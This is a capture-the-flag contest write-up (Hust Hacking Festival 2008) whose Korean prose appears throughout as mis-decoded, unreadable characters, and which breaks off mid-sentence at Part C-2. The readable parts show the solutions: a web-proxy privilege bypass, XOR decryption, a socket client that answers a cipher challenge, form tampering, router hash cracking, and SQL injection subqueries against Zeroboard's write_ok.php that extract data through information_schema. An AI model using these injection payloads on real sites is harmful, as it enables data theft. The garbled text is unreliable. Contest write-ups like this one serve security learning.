===================================== < Hust Hacking Festival 2008 Report > by hkpco(¹ÚÂù¾Ï) ------------------------------------- mail - chanam.park@hkpco.kr homepage - http://hkpco.kr/ ===================================== ´ëȸ Âü°¡ ¾ÆÀ̵ð - newheart ------------------------------------- "I am so sorry!" ´ëȸ Âü¿©ÀÚ´Â ¸ðµÎ ÀÔ»óÀ» ¿°µÎÇÏ°í Áß°£Áß°£ ½ºÅ©¸°¼¦À» ÂïÀ¸¶ó´Â ¸í½Ã°¡ µÇ¾î ÀÖÁö¸¸ ´ëȸ ±â°£ ³»³» ³Ê¹« Á¤½ÅÀÌ ¾ø´ø Å¿¿¡ ÇÑ Àå ¹Û¿¡ ÂïÁö ¸øÇß½À´Ï´Ù. ´õ±º´Ù³ª ´ÜÁö ¹®Á¦ ±¸°æÀ» À§ÇÏ¿© »ìÆ캸´Ù°¡ Áß°£¿¡ °©ÀÛ½º·± Èï¹Ì·Î µÚ´ÊÀº Âü¿©¸¦ ½ÃÀÛÇÏ°Ô µÈ ´öºÐ¿¡ ·Î±×Á¶Â÷ ³²±æ ¸¶À½ÀÇ ¿©À¯°¡ ¾ø¾ú´ø °Í °°½À´Ï´Ù. ´ëȸ ±â·ÏÀÌ ¸¹ÀÌ ºÎÁ·ÇÑ Á¡ ¾çÇØ ºÎŹµå¸³´Ï´Ù. Part A - 1 ƯÁ¤ ±ÇÇÑÀÇ °øÁö ±ÛÀ» Àд ¹®Á¦ÀÔ´Ï´Ù. ·¹º§ º¯°æ ÆäÀÌÁö°¡ Á¸ÀçÇϸç level 1 ~ 5 ±îÁöÀÇ ¹öÆ°ÀÌ ÀÖ½À´Ï´Ù. level1ÀÌ µÇ¾î¾ß Æнº¿öµå°¡ ´ã±ä ±ÛÀ» ÀÐÀ» ¼ö Àִµ¥, ÇöÀç ±ÇÇÑÀº level5·Î µÇ¾îÀֱ⠶§¹®¿¡ À̸¦ º¯°æÇØ¾ß ÇÕ´Ï´Ù. level2 ±îÁö´Â °£´ÜÈ÷ º¯°æÀÌ °¡´ÉÇÏÁö¸¸ level1Àº °ü¸®ÀÚ ¸¸ÀÌ ¹Ù²Ü ¼ö ÀÖµµ·Ï ±¸¼ºµÇ¾î Àֱ⠶§¹®¿¡ ´Ù¸¥ ¹æ¹ýÀ» ½á¾ßÇÕ´Ï´Ù. ÀÏ¹Ý °Ô½ÃÆÇÀÌ º¸À̱淡 XSS·Î °ü¸®ÀÚÀÇ ÄíÅ° ȤÀº ¼¼¼ÇÀ» °¡Á®¿À°Å³ª, CSRF °ø°ÝÀ» ÅëÇÏ¿© ƯÁ¤ °èÁ¤ÀÇ ·¹º§ º¯°æÀ» ½ÃµµÇϵµ·Ï °ø°ÝÇØ º¸¾ÒÁö¸¸ »ý°¢Ã³·³ Àß µÇÁö ¾Ê¾Ò½À´Ï´Ù. ´Ù¾çÇÑ ½ÃÇàÂø¿À ³¡¿¡ ±Û ¿­¶÷ ½Ã ´ÙÀ½°ú °°Àº Ãë¾àÇÑ ·¹º§ üũ Äڵ带 À¯ÃßÇØ ³¾ ¼ö ÀÖ¾ú½À´Ï´Ù. -- if( $level < 2 ) { echo "ÀÎÁõ ¼º°ø"; } else { echo "ÀÎÁõ ½ÇÆÐ"; } -- Áï, Á¶°Ç¹®ÀÇ À߸øµÈ »ç¿ëÀ¸·Î ÀÎÇØ levelÀÌ 1ÀÌ ¾Æ´Ï¾îµµ ±× ÀÌÇÏÀÎ °æ¿ì ¶ÇÇÑ ±Û ¿­¶÷ÀÌ °¡´ÉÇØ Áö´Â °ÍÀÔ´Ï´Ù. ·¹º§ º¯°æ ÆäÀÌÁö¿¡¼­ À¥ ÇÁ·Ï½Ã¸¦ ÅëÇÏ¿© ÇöÀç ·¹º§À» 1 ÀÌÇÏ·Î ¼³Á¤ÇÑ µÚ ±ÛÀ» ¿­¶÷ÇÏ¿´À¸¸ç Æнº¿öµå¸¦ ȹµæÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù. Part A - 2 ÅؽºÆ® ÆÄÀÏÀÇ ³»¿ëÀ» ¾Ïȣȭ ½ÃÄÑÁÖ´Â À©µµ¿ì ¹ÙÀ̳ʸ®¿Í À̸¦ ÅëÇØ ¾Ïȣȭ µÈ Æнº¿öµå ÆÄÀÏÀÌ ÁÖ¾îÁý´Ï´Ù. ƯÁ¤ ÆÄÀÏÀ» ÁöÁ¤ÇØ ÁÖ¸é ¾Ïȣȭ¸¦ ¼öÇàÇÑ µÚ ÆÄÀÏÀ» »ý¼ºÇÏ¿© ¾ÏÈ£¹®À» ÀúÀåÇØ ÁÝ´Ï´Ù. ÇØ´ç ¾Ïȣȭ ·çƾÀº WriteFile() API¸¦ ¿ªÀ¸·Î ÃßÀûÇÏ¿© ãÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. ´ÙÀ½°ú °°½À´Ï´Ù(ÁÖ¼® Ãß°¡). -- .text:004014B9 mov ecx, ebp ; ecx = file size .text:004014BB sub edx, ebp .text:004014BD mov edi, esi ; edi = filesize .text:004014BF .text:004014BF loc_4014BF: ; CODE XREF: .text:004014D9j .text:004014BF mov al, [edx+ecx] ; al = edx+ecx .text:004014BF ; ecx -> cnt .text:004014BF ; edx -> plain text .text:004014BF ; .text:004014C2 xor al, bl ; al = al ^ bl .text:004014C4 mov [ecx], al ; [ecx] = al; .text:004014C6 and eax, 0FFh ; eax = eax & 0xff .text:004014CB shr ebx, 8 ; ebx = ebx >> 8 .text:004014CE mov eax, dword_4190B0[eax*4] ; eax = 4190b0[eax*4] .text:004014D5 xor ebx, eax ; ebx = ebx ^ eax .text:004014D7 inc ecx ; ecx++ .text:004014D8 dec edi ; edi-- .text:004014D9 jnz short loc_4014BF ; al = edx+ecx .text:004014D9 ; ecx -> cnt .text:004014D9 ; edx -> plain text -- xorÀ» ¼öÇàÇϴ°ÍÀ» ¾Ë ¼ö ÀÖÀ¸¸ç Å° Å×À̺íÀº ´ÙÀ½ ÁÖ¼Ò¿¡ ÀúÀåµË´Ï´Ù. -- 004190B0 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 ....?w,aîºQ. . . . -- ¾ÏÈ£ ·çƾÀ» C¾ð¾î·Î ³ªÅ¸³»¸é ´ÙÀ½°ú °°½À´Ï´Ù. -- #define MAX 4096 int main( void ) { int cnt; char ch; char str[MAX]; char x_table[] = { 0x00, 0x00, 0x00, 0x00, 0x96, 0x30, 0x07, 0x77 .. ... ... ... }; unsigned long ebx = 0xA9D4FB79; for( cnt = 0 ; cnt < MAX ; cnt++ ) { ch = str[cnt]; ch = ch ^ (ebx&0xff); printf( "%c", ch ); fflush(stdout); ebx = ebx >> 8; ch = x_table[ch*4]; ebx = ebx ^ ch; } return 0; } -- xorÀº °°Àº °ªÀ¸·Î µÎ ¹ø ¿¬»êÇÏ°Ô µÇ¸é ¿ø·¡ÀÇ °ªÀ¸·Î µ¹¾Æ¿À´Â Ư¡ÀÌ ÀÖ½À´Ï´Ù. ±×·¡¼­ ¾Ïȣȭ ·çƾÀ» À¯ÃßÇÏ¿© µû·Î º¹È£È­ ·çƾÀ» ÀÛ¼ºÇÒ ÇÊ¿ä°¡ ¾ø½À´Ï´Ù. ¹®Á¦¿¡¼­ ÁÖ¾îÁø ÆÄÀÏÀ» º¹È£È­ ÇÏ¿© ´ÙÀ½°ú °°Àº Æнº¿öµå¸¦ ¾òÀ» ¼ö ÀÖ½À´Ï´Ù. -- [hkpco@hkpco HUST]$ ./hk_dec < password.txt &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& ÀÎÁõ°ª : 38d9587b9be0bd19be5dcb109f023504 !@%!@!@#^*!@#^(!@^(!@)^!@^!@^(!^$%($^#$^%(%#^(%#(^^#(@%#(^@%^ $(_(*^%$$%*()($#$%^&*()&^%$#$%^&*)(*&^%$%^&*((*&%$#$%^&*()(** &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& &&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$* $#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$& -- part A - 3 sQuest.jar À̶ó´Â ÆÄÀÏÀÌ ÁÖ¾îÁö¸ç ÀÚ¹Ù·Î ÀÛ¼ºµÈ ¼­¹ö ÆÄÀÏ °°¾Ò½À´Ï´Ù. ¹­¿©ÀÖ´Â ÆÄÀÏÀ» Ç®¾î¼­ ÀÚ¹Ù µðÄÄÆÄÀÏ·¯¸¦ ÀÌ¿ëÇÏ¿© Äڵ带 »ìÆ캸´ø µµÁß Client.class ÆÄÀÏ¿¡¼­ ¼­¹ö Á¢¼Ó °ü·Ã Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. -- . . public Client() { Socket socket1; socket1 = null; try { socket1 = new Socket("220.95.152.32", 9000); DataInputStream datainputstream = new DataInputStream(socket1.getInputStream()); DataOutputStream dataoutputstream = new DataOutputStream(socket1.getOutputStream()); BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(System.in)); (new ListenThread(datainputstream)).start(); System.out.println("ready!!"); do { String s = bufferedreader.readLine(); if(s.equalsIgnoreCase("quit")) System.exit(0); . . . -- ¼­¹ö ÁÖ¼Ò´Â 220.95.152.32 À̸ç Æ÷Æ®´Â 9000 À̾ú½À´Ï´Ù. ¼­¹ö¿¡ Á¢¼ÓÇÏ¿© ¹®ÀÚ¿­À» º¸³»¸é ƯÁ¤ ±ÔÄ¢À¸·Î ÀÎÄÚµù µÇ¾ú´Âµ¥ °£´ÜÇÑ ÀÛ¾÷À̱⠶§¹®¿¡ ¼öµ¿À¸·Î Á÷Á¢ °¢ ¹®ÀÚ¿¡ ¸ÅÇεǴ ¹®ÀÚ¸¦ ã¾Æ ³»¾ú½À´Ï´Ù. -- A -> C B -> E C -> H D -> L E -> K . . V -> G W -> B X -> O Y -> S Z -> V -- ¼­¹ö¿¡ Á¢¼ÓÇϸé ÀÎÄÚµù µÈ ¹®ÀÚ¿­·Î ¿¹»óµÇ´Â ºÒ±ÔÄ¢ÀûÀÎ 7bytesÀÇ ½ºÆ®¸µÀ» Ãâ·ÂÇØ Áִµ¥, ÀÌ¿¡ ´ëÇÑ Æò¹®À» ´Ù½Ã Àü¼ÛÇÏ¸é ¾î¶°ÇÑ ÀÀ´äÀÌ ¿Ã °ÍÀ¸·Î ¿¹»óÇÏ°í ´ÙÀ½°ú °°ÀÌ °£´ÜÇÑ ÄÚµùÀ» ÇÏ¿´½À´Ï´Ù. -- /* hkpco ChanAm Park */ #include #include #include #include #include #include #include #include #include int sock_conn( char **argv ); int err( char *msg ); int main( int argc , char **argv ) { int sockfd; char buffer[1024] = {0x00,}; char *p = buffer; char table[] = {'C','E','H','L','K','M','A','Y','T','D','X','R','Z', 'U','I','Q','N','P','J','F','W','G','B','O','S','V'}; char key[16] = {0x00,}; int cnt, cnt_in; if( argc < 3 ) { fprintf( stderr, "%s [server] [port]\n", argv[0] ); return -1; } sockfd = sock_conn( argv ); memset( buffer, 0x0, sizeof(buffer) ); read( sockfd, buffer, sizeof(buffer) ); printf( "%s\n", buffer ); printf( "%s\n", p+7 ); for( cnt = 0 ; cnt < 7 ; cnt++ ) { for( cnt_in = 0 ; cnt_in < sizeof(table) ; cnt_in++ ) { if( *(p+7+cnt) == table[cnt_in] ) { printf( "%c\n", 'A'+cnt_in ); key[cnt] = 'A'+cnt_in; } } } printf( "key: %s\n", key ); write( sockfd, key, strlen(key) ); memset( buffer, 0x0, sizeof(buffer) ); read( sockfd, buffer, sizeof(buffer) ); printf( "last rcv: %s\n", buffer ); close(sockfd); return 0; } int sock_conn( char **argv ) { int sockfd; struct sockaddr_in sock; struct hostent *host_st; sockfd = socket( PF_INET, SOCK_STREAM, 0 ); if( sockfd < 0 ) err( "socket()" ); host_st = gethostbyname( argv[1] ); if( host_st == NULL ) err( "gethostbyname()" ); bzero( sock.sin_zero, sizeof(sock.sin_zero) ); sock.sin_family = AF_INET; sock.sin_port = htons(atoi(argv[2])); sock.sin_addr = *((struct in_addr *)host_st->h_addr); if( connect( sockfd, (struct sockaddr *)&sock, sizeof(sock) ) < 0 ) err( "connect()" ); return sockfd; } int err( char *msg ) { perror(msg); exit(-1); } -- ½ÇÇàÇÑ °á°ú NEXT : solution À̶ó´Â ¸Þ½ÃÁö¸¦ Àü´Þ¹ÞÀ» ¼ö ÀÖ¾úÀ¸¸ç ÀÌ ¶§ Àü´ÞÇÑ Æò¹®ÀÌ ÀÎÁõ Æнº¿öµå°¡ µÇ¾ú½À´Ï´Ù. Part A - 4 Ajax·Î ÄÚµù µÈ °èÁ ÀÌü ÆäÀÌÁö°¡ ÁÖ¾îÁ³½À´Ï´Ù. ±×·±µ¥ À¥ ÇÁ·Ï½Ã·Î È®ÀÎÇØ º» °á°ú ÀÌü ¹öÆ°À» Ŭ¸¯ÇÏ¿©µµ ÀÌü ½ÇÆжó´Â °æ°í⸸ ¶ã »Ó ¾î¶°ÇÑ submitµµ ÀÌ·ç¾îÁöÁö ¾Ê´Â °ÍÀ» ¾Ë ¼ö ÀÖ¾ú½À´Ï´Ù. À¥ ÆäÀÌÁöÀÇ ¼Ò½º Äڵ带 º¸¸é JScript.Encode°¡ µÇ¾î Àֱ⠶§¹®¿¡ ¿ø·¡ÀÇ ¼Ò½º Äڵ带 º¼ ¼ö ¾ø´Âµ¥, ÀÌ´Â ´Ù¾çÇÑ ÅøÀ̳ª À¥»ó¿¡¼­ Á¦°øÇÏ´Â µðÄÚµù ¼­ºñ½º¸¦ ÀÌ¿ëÇÏ¸é ½±°Ô º¹È£È­ ÇÒ ¼ö ÀÖ½À´Ï´Ù. °èÁ ÀÌü ÆäÀÌÁöÀÇ submit ÄÚµå´Â ´ÙÀ½°ú °°½À´Ï´Ù. --
    . .
-- ¹öÆ°À» Ŭ¸¯Çϸé fcInputBtn();ÀÌ È£ÃâµÇ¸ç ÇØ´ç ÄÚµå´Â ´ÙÀ½°ú °°½À´Ï´Ù. -- function fcInputBtn() { document.fInput.action = 'chivasRegal.html'; window.alert('ÀÌü ½ÇÆÐ!'); } -- ±âÁ¸ makgurlri.php¿¡¼­ chivasRegal.html·Î actionÀ» ¹Ù²Ù¾î Áִ°ÍÀ» º¼ ¼ö ÀÖÀ¸¸ç ½ÇÁ¦ formÀÇ action ¶ÇÇÑ chivasRegal.html·Î º¯°æÇÏ¿© submitµÇµµ·Ï ¼öÁ¤ÇÏ¿´½À´Ï´Ù. ½Ã°£ÀÌ ²Ï °É¸±¹ýÇÑ º¹ÀâÇÑ ¼ö½ÄÀ» Æнº¿öµå¶ó°í Ãâ·ÂÇØ ÁÖ¾úÀ¸¸ç ªÀº ½Ã°£¸¶´Ù ¹Ù²î¾î¼­ óÀ½¿¡´Â ¹®Á¦¿¡¼­ Ãâ·ÂÇØ ÁÖ´Â º¹ÀâÇÑ ¼ö½ÄÀ» À§ÇÑ ¹®Á¦ Àü¿ë °è»ê Äڵ带 ÀÛ¼ºÇÏ¿´Áö¸¸, °á±¹ ÀÌ·¯ÇÑ ÀÛ¾÷ÀÌ ÇÊ¿äÇÏÁö ¾Ê´Ù´Â °ÍÀ» ¾Ë°ÔµÇ¾ú½À´Ï´Ù. ÆÐŶ ĸÃÄ °á°ú¿¡¼­ Æнº¿öµå¸¦ Ãâ·ÂÇØÁÖ´Â ÆäÀÌÁö°¡ Æ÷ÇԵǾî ÀÖ¾úÀ¸¸ç »ç¿ëÀÚ¿¡°Ô ÀÔ·ÂÀ» ¹Þ´Â ÀÎÁõ Æнº¿öµå¿Í OPT °ªÀº ¾Æ¹« »ó°üÀÌ ¾ø´Â°ÍÀ¸·Î º¸¿´½À´Ï´Ù. Æнº¿öµå´Â "By doubting we come at the truth" ÀÔ´Ï´Ù. Part B - 1 ½Ã, ºÐ, ÃÊ, ¹Ð¸®Ãʸ¦ Ç¥½ÃÇØ Áִ ŸÀ̸Ӱ¡ °¢°¢ ¼¼ °³°¡ Á¸ÀçÇÏ´Â À©µµ¿ì ¹ÙÀ̳ʸ®°¡ ÁÖ¾îÁ³½À´Ï´Ù. ollydbg·Î »ìÆ캻 °á°ú °¢ ½Ã°£ ´ÜÀ§¸¶´Ù ´ÙÀ½°ú °°Àº ºñ±³ ±¸¹®À» °ÅÃƽÀ´Ï´Ù(ollydbg·Î º» ÄÚµå). -- . . 0040163E > \BF 3C000000 mov edi, 3C ; Default case of switch 004015EA 00401643 > 8B4E 70 mov ecx, dword ptr ds:[esi+70] 00401646 . B8 74000000 mov eax, 74 0040164B . 3BC8 cmp ecx, eax 0040164D . 75 1D jnz short timer.0040166C 0040164F . 837E 74 70 cmp dword ptr ds:[esi+74], 70 00401653 . 75 17 jnz short timer.0040166C 00401655 . 837E 78 72 cmp dword ptr ds:[esi+78], 72 00401659 . 75 11 jnz short timer.0040166C 0040165B . 3946 6C cmp dword ptr ds:[esi+6C], eax 0040165E . 75 0C jnz short timer.0040166C 00401660 . 53 push ebx 00401661 . 53 push ebx 00401662 . 68 50304000 push timer.00403050 ; ASCII "You are around solution" 00401667 . E8 D2040000 call . . . -- ŸÀÌ¸Ó ½Ã°£ÀÇ ºñ±³ Á¶°ÇÀ» ¸¸Á·ÇÏ¸é ´ÙÀ½°ú °°Àº ·çƾÀ» °ÅÄ¡°Ô µË´Ï´Ù(ida·Î º» ÄÚµå). -- .text:00401280 sub_401280 proc near ; DATA XREF: .rdata:004025ACo .text:00401280 .text:00401280 arg_0 = dword ptr 4 .text:00401280 .text:00401280 push esi .text:00401281 mov esi, ecx .text:00401283 push edi .text:00401284 mov edi, [esp+8+arg_0] .text:00401288 lea eax, [esi+6Ch] .text:0040128B push eax .text:0040128C push 3EDh .text:00401291 push edi .text:00401292 call ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &) .text:00401297 lea ecx, [esi+70h] .text:0040129A push ecx .text:0040129B push 3E8h .text:004012A0 push edi .text:004012A1 call ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &) .text:004012A6 lea edx, [esi+74h] .text:004012A9 push edx .text:004012AA push 3EBh .text:004012AF push edi .text:004012B0 call ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &) .text:004012B5 lea eax, [esi+78h] .text:004012B8 push eax .text:004012B9 push 3ECh . . . -- ÀÌÀü¿¡ ºñ±³ÇÑ Å¸À̸ÓÀÇ ½Ã°¢µéÀÌ DDX_TextÀÇ ÀÎÀÚ·Î Àü´ÞµÇ´Âµ¥, ÇÔ¼ö È£Ãâ ¼ø¼­°¡ ¾Æ´Ñ µÎ ¹ø° ÀÎÀÚ(¿¡µðÆ® ÄÁÆ®·Ñ ID) ¼øÀ¸·Î ¾Æ½ºÅ° Äڵ带 Á¤·ÄÇϸé "tprtlgyflsla" À̶ó´Â ¹®ÀÚ¿­À» ±¸ÇÒ ¼ö ÀÖÀ¸¸ç ÀÌ°ÍÀÌ Æнº¿öµå°¡ µË´Ï´Ù. Part B - 2 Å×Æ®¸®½º °ÔÀÓÀÌ ÁÖ¾îÁö¸ç, °ÔÀÓ ³»¿¡ Æ÷ÇÔ µÈ À̹ÌÁö´ë·Î ºí·°À» ½×À¸¸é Æнº¿öµå¸¦ ³ªÅ¸³» Áִ°ÍÀ¸·Î º¸¿´½À´Ï´Ù. ÀÌ´Â ÇöÀç ºí·° »óÅ Á¤º¸¸¦ ÀúÀåÇÏ¿© ÁÖ´Â ¸Þ¸ð¸® ¿µ¿ªÀ» ±×¸²´ë·Î º¯°æÇÏ¸é µÇ¸ç Á¶°ÇÀÌ ¸¸Á·ÇÏ¿´À» °æ¿ì Æнº¿öµå°¡ ªÀº ½Ã°£ °£°ÝÀ¸·Î ÇÑ ¹®ÀÚ¾¿ º¸¿©Áö±â ¶§¹®¿¡ ºí·Ï »óÅ Á¤º¸¸¦ µû·Î ÀúÀåÇØ µÎÁö ¾ÊÀ¸¸é ¼ø°£ÀûÀ¸·Î Áö³ª°¡´Â ¹®ÀÚµéÀ» ³õÄ¥ ¼ö ÀÖÀ¸¹Ç·Î ÀÌ´Â µû·Î ÀúÀåÇØ µÎ´Â °ÍÀÌ ÁÁ½À´Ï´Ù. °ÔÀÓ¿¡¼­ ÁÖ¾îÁö´Â ±×¸²°ú µ¿ÀÏÇÑ ºí·°ÀÇ »óÅ Á¤º¸´Â ´ÙÀ½°ú °°½À´Ï´Ù. -- 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 . . . 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 -- ÀÎÁõÅ°´Â ÇÑ ¹®ÀÚ¾¿ ³ªÅ¸³ª¸ç À̸¦ ³ª¿­ÇØ º¸¸é "BE5tP4SVxA5Lki18" ¶ó´Â Æнº¿öµå¸¦ ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù. Part B - 3 ¶ó¿ìÅÍ Á¢¼Ó ½Ã È­¸éÀÇ ½ºÅ©¸° ¼¦À» º¸¿©ÁÖ¸ç À̸¦ ÅëÇØ Æнº¿öµå¸¦ ¾Ë¾Æ³»´Â°ÍÀÌ ¹®Á¦ÀÔ´Ï´Ù. root °èÁ¤ Æнº¿öµåÀÇ hash °ªÀÌ Æ÷ÇԵǾî ÀÖ¾ú°í, À¥¿¡¼­ Á¦°øµÇ´Â ½Ã½ºÄÚ ¶ó¿ìÅÍ °ü·Ã Å©·¢ ¼­ºñ½º¸¦ ÅëÇÏ¿© º¹È£È­ ÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù. Æнº¿öµå´Â, "CAFEamericano!!" Part B - 4 Á¦·Îº¸µå °Ô½ÃÆÇ 3°³¿Í ºñ¹Ð±Û 2°³°¡ Á¸ÀçÇÏ´Â ÆäÀÌÁö°¡ ÁÖ¾îÁ³½À´Ï´Ù. ºñ¹Ð±ÛÀº write_ok.php¿¡¼­ ±Û »èÁ¦ ½Ã »ç¿ëµÇ´Â $del_queX º¯¼ö¸¦ Á¶ÀÛÇϸé ÀÐÀ» ¼ö ÀÖÀ¸¸ç Ãë¾à ºÎºÐÀÇ php ÄÚµå´Â ´ÙÀ½°ú °°½À´Ï´Ù. -- @mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no', child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email', homepage='$homepage',subject='$subject',memo='$memo',sitelink1='$sitelink1',sitelink2='$sitelink2', use_html='$use_html',reply_mail='$reply_mail',is_secret='$is_secret', category='$category' $del_que1 $del_que2 where no='$no'") or error(mysql_error()); -- ¿©±â¼­ °¡Àå ¸¶Áö¸· ºÎºÐÀÇ $del_que1À» ÀÌ¿ëÇÏ¿© °ø°ÝÀ» ½ÃµµÇÏ¿´½À´Ï´Ù. ºñ¹Ð±ÛÀº ´ÙÀ½°ú °°ÀÌ º¼ ¼ö ÀÖ½À´Ï´Ù. -- , memo=(select memo from zetyx_board_bOarD_1 where no=°Ô½Ã±Û¹øÈ£) -- µÎ °³ÀÇ ºñ¹Ð±Û ³»¿ëÀº °¢°¢ "TABLE NAME", "721f214d3c9de37d58a5b38c55e651c7" À̾úÀ¸¸ç, »õ·Î¿î °ø°ÝÀ» ½ÃµµÇØ¾ß Çϴ°ÍÀ¸·Î º¸¿´½À´Ï´Ù. ÇØ´ç Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© information_schema db¸¦ »ìÆ캻 °á°ú 721f214d3c9de37d58a5b38c55e651c7 Å×À̺íÀ» Æ÷ÇÔÇÏ´Â database À̸§À» ¾Ë¾Æ³¾ ¼ö ÀÖ¾ú½À´Ï´Ù. 721f214d3c9de37d58a5b38c55e651c7 Å×À̺íÀ» Æ÷ÇÔÇÏ´Â db À̸§Àº bIgBaNG À̸ç, °¢°¢ÀÇ Ä÷³ À̸§Àº P, A, SS, W, O, R, D ¶ó´Â °ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù. °¢ Çʵ尪Àº ´ÙÀ½°ú °°ÀÌ ÃßÃâÇÏ¿´½À´Ï´Ù. -- , memo=(select P from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) , memo=(select A from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) , memo=(select SS from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) , memo=(select W from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) , memo=(select O from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) , memo=(select R from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) , memo=(select D from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) -- ÀÌ·¸°Ô ±¸ÇÑ ÃÖÁ¾ÀûÀÎ ¹®ÀÚ¿­À» ³ª¿­Çϸé "m@ket0d4yth3b3Std@y0fy0Url!F3"¶ó´Â Æнº¿öµå¸¦ ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù. Part C - 1 ³×Æ®¿öÅ©»ó¿¡ µ¹¾Æ´Ù´Ï´Â ÆÐŶµéÀ» ĸÃÄÇÑ °ÍÀ¸·Î º¸ÀÌ´Â 16Áø¼ö ÄÚµåµéÀÌ ÁÖ¾îÁ³½À´Ï´Ù. µ¥ÀÌÅÍ ºÎºÐÀ¸·Î ÃßÃøµÇ´Â ¿µ¿ª¿¡ ¹®ÀÚ·Î ³ªÅ¸³¾ ¼ö ÀÖ´Â ¹üÀ§ÀÇ ¿¬¼ÓµÈ 16Áø¼öµéÀÌ º¸¿´À¸¸ç À̸¦ °¢°¢ ¹®ÀÚ·Î º¯È¯Çϸé "PASS qksrkqtmqslek" ¶ó´Â ¹®ÀÚ¿­À» ¾òÀ» ¼ö ÀÖ½À´Ï´Ù. Æнº¿öµå´Â, "qksrkqtmqslek" ÀÔ´Ï´Ù. Part C - 2 °Ô½ÃÆÇÀÌ ÁÖ¾îÁ³À¸¸ç »¡°­»öÀ¸·Î Ç¥½Ã µÈ "ÀÌ°Ô Á¤´äÀÌ ¸Â³ª¿ä??"¶ó´Â Á¦¸ñÀÇ ÀÐÀ» ¼ö Ÿã´Â ±ÛÀÌ Á¸ÀçÇÏ¿´½À´Ï´Ù. Ç®ÀÌ´Â 